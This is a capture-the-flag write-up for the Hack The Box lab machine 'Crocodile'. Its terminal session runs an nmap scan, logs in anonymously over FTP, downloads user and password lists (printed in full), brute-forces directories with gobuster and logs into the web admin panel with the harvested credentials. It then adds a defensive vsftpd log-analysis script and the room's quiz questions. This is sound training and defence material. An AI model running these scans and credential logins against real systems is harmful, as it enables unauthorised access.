Difficulty: Very Easy | Tier 1 | OS: Linux | IP: 10.129.1.15

$ crocodile.pwn()

Anonymous FTP login exposes two files: a user list and a password list. We use gobuster to find login.php, then authenticate as admin through the web interface with the harvested credentials.

Techniques

- Anonymous FTP Login
- Credential Harvesting
- Directory Brute Force
- PHP Login Bypass

Open Ports

21/tcp  ftp   vsftpd 3.0.3
80/tcp  http  Apache httpd 2.4.41 (Ubuntu)

Terminal Session

wazimu@htb ~ crocodile
┌─[us-starting-point-1-dhcp]─[10.10.14.32]─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ nmap -sC -sV 10.129.1.15
Nmap scan report for 10.129.1.15

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- allowed.userlist
|_-rw-r--r-- allowed.userlist.passwd
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

┌─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ ftp 10.129.1.15
Name: Anonymous
230 Login successful.
ftp> get allowed.userlist
ftp> get allowed.userlist.passwd
ftp> exit

┌─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ cat allowed.userlist
aron
pwnmeow
egotisticalsw
admin

┌─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ cat allowed.userlist.passwd
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd

┌─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ gobuster dir -u 10.129.1.15 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html
/login.php            (Status: 200) [Size: 1577]
/dashboard            (Status: 301) [--> http://10.129.1.15/dashboard/]

# Credentials: admin / rKXM59ESxesUFHAd (last user / last password)
[✓] Flag captured after login!
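From the defender's side, the whole foothold above shows up in vsftpd's own log: an anonymous login followed by downloads of the two list files. The script below is an added example, not part of the original writeup; its sample log lines are constructed to approximate vsftpd's default log format, and the sensitive-name hints are an assumption you would tune to your environment.

```python
"""Flag anonymous FTP sessions that retrieve sensitive-looking files from vsftpd logs."""
import re
from collections import defaultdict

# Constructed sample log: one anonymous session pulling both files from the
# writeup, plus an authenticated session that should not raise an alert.
SAMPLE_LOG = """\
Tue Mar 05 10:01:02 2024 [pid 1401] CONNECT: Client "10.10.14.32"
Tue Mar 05 10:01:05 2024 [pid 1400] [ftp] OK LOGIN: Client "10.10.14.32", anon password "?"
Tue Mar 05 10:01:09 2024 [pid 1402] [ftp] OK DOWNLOAD: Client "10.10.14.32", "/allowed.userlist", 33 bytes, 12.50Kbyte/sec
Tue Mar 05 10:01:12 2024 [pid 1402] [ftp] OK DOWNLOAD: Client "10.10.14.32", "/allowed.userlist.passwd", 62 bytes, 20.10Kbyte/sec
Tue Mar 05 10:05:40 2024 [pid 1410] [aron] OK LOGIN: Client "10.10.14.40"
Tue Mar 05 10:06:01 2024 [pid 1411] [aron] OK DOWNLOAD: Client "10.10.14.40", "/notes.txt", 10 bytes, 1.00Kbyte/sec
"""

# vsftpd logs the anonymous account under its ftp_username (default "ftp")
# and appends 'anon password "..."' to the LOGIN line.
LOGIN_RE = re.compile(r'\[(?P<user>[^\]]+)\] OK LOGIN: Client "(?P<client>[^"]+)"(?P<anon>, anon password)?')
DOWNLOAD_RE = re.compile(r'\[(?P<user>[^\]]+)\] OK DOWNLOAD: Client "(?P<client>[^"]+)", "(?P<path>[^"]+)"')

# Assumed substrings that mark a file nobody should be able to fetch anonymously.
SENSITIVE_HINTS = ("passwd", "userlist", "shadow", ".key")


def analyse(log_text):
    """Return {client: {"anonymous", "downloads", "sensitive"}} for anonymous sessions only."""
    sessions = defaultdict(lambda: {"anonymous": False, "downloads": [], "sensitive": []})
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m and (m.group("anon") or m.group("user") == "ftp"):
            sessions[m.group("client")]["anonymous"] = True
            continue
        m = DOWNLOAD_RE.search(line)
        if m and m.group("user") == "ftp":
            s = sessions[m.group("client")]
            s["downloads"].append(m.group("path"))
            if any(h in m.group("path").lower() for h in SENSITIVE_HINTS):
                s["sensitive"].append(m.group("path"))
    return {c: s for c, s in sessions.items() if s["anonymous"]}


def alerts(log_text):
    """One alert string per anonymous client that pulled a sensitive-looking file."""
    return [f"anonymous client {c} retrieved {', '.join(s['sensitive'])}"
            for c, s in analyse(log_text).items() if s["sensitive"]]


if __name__ == "__main__":
    for a in alerts(SAMPLE_LOG):
        print(a)
```

The lasting fix is still `anonymous_enable=NO` in vsftpd.conf (or an empty anonymous root); the log check just tells you whether that setting ever slipped.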

Tasks (9)

1. What Nmap scanning switch employs the use of default scripts during a scan?

2. What service version is found to be running on port 21?

3. What FTP code is returned to us for the 'Anonymous FTP login allowed' message?

4. After connecting to the FTP server using the ftp client, what username do we provide when prompted to log in anonymously?

5. After connecting to the FTP server anonymously, what command can we use to download the files we find on the FTP server?

6. What is one of the higher-privilege sounding usernames in 'allowed.userlist' that we download from the FTP server?

7. What version of Apache HTTP Server is running on the target host?

8. What switch can we use with Gobuster to specify we are looking for specific filetypes?

9. Which PHP file can we identify with directory brute force that will provide the opportunity to authenticate to the web service?

Root Flag